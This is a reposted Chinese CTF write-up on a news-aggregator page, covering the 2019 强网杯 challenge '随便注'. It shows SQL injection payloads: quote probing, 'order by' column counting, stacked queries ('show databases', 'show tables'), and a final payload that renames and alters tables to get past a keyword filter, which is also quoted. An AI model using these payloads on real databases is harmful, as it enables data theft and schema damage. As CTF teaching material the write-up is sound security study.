首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-07-12 20:37:56
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
包粽子的方法與步驟
包粽子的方法與步驟
包粽子的方法與步驟?材料:粽葉、糯米、草繩、花生、大棗、燕麥,接下來我們就來聊聊關于包粽子的方法與步驟?以下内容大家不妨參考一二希望能幫到您!包粽子的方法與步驟材料:粽葉、糯米、草繩、花生、大棗、燕麥。挑取兩片粽葉,讓葉片光滑的一面朝上。在...
2026-07-12
植物的根有什麼作用
植物的根有什麼作用
植物的根有什麼作用?植物的根主要是吸收水分及養分、新陳代謝、固定植物、繁殖作用,下面我們就來聊聊關于植物的根有什麼作用?接下來我們就一起去了解一下吧!植物的根有什麼作用植物的根主要是吸收水分及養分、新陳代謝、固定植物、繁殖作用。吸收水分及養...
2026-07-12
治愈系好聽的勵志昵稱女
治愈系好聽的勵志昵稱女
治愈系好聽的勵志昵稱女?擦幹眼淚我還是王熱血與夢想,今天小編就來聊一聊關于治愈系好聽的勵志昵稱女?接下來我們就一起去研究一下吧!治愈系好聽的勵志昵稱女擦幹眼淚我還是王熱血與夢想奮鬥第一好好學習天天向上倔強的夢想奮鬥必經之路原味夏天等我變優秀...
2026-07-12
個性網名女生霸氣簡短
個性網名女生霸氣簡短
個性網名女生霸氣簡短?網事随風心事随你,今天小編就來說說關于個性網名女生霸氣簡短?下面更多詳細答案一起來看看吧!個性網名女生霸氣簡短網事随風心事随你半島未涼森海北嶼像涼性人像暖風人童心未泯童言無忌酒場浪女穩場浪女一季飄零一季淺舞美麗如水月透...
2026-07-12
秋後大雨兆頭好不好
秋後大雨兆頭好不好
【導語】俗語:春雨驚春清谷天。過了立春,就到了春天第二個節氣:雨水。2021年2月18日,是大年初七,恰恰是二十四節氣之二的雨水節氣。農諺說得好!農諺:“雨打五更頭,午時有日頭”,是什麼意思?我是養花綠植,看看這個農諺,就會知道早上下雨,預...
2026-07-12
Copyright 2023-2026 - www.tftnews.com All Rights Reserved